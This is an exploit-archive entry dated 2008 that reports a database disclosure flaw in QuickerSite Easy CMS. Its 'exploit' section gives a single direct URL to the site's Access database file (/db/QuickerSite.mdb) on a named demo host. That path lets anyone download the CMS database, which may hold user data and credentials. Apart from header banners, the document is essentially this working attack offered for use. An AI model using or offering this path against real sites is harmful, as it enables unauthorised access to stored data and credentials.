id: 4490
date: 12/17/2008
title: QuickerSite Easy CMS (QuickerSite.mdb) Database Disclosure Vulnerability
author: AlpHaNiX
cves: 

========================================================================
QuickerSite Easy CMS (QuickerSite.mdb) Database Disclosure Vulnerability
========================================================================



###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX

###########################################################################

#script   : QuickerSite Easy CMS
#download : null
#Demo     : http://cupofcoffee.quickersite.com/


###########################################################################

#Exploits :

--=[DATABASE DISCLOSURE]=--

http://cupofcoffee.quickersite.com/db/QuickerSite.mdb


###########################################################################



#  0day.today [2023-03-24]  #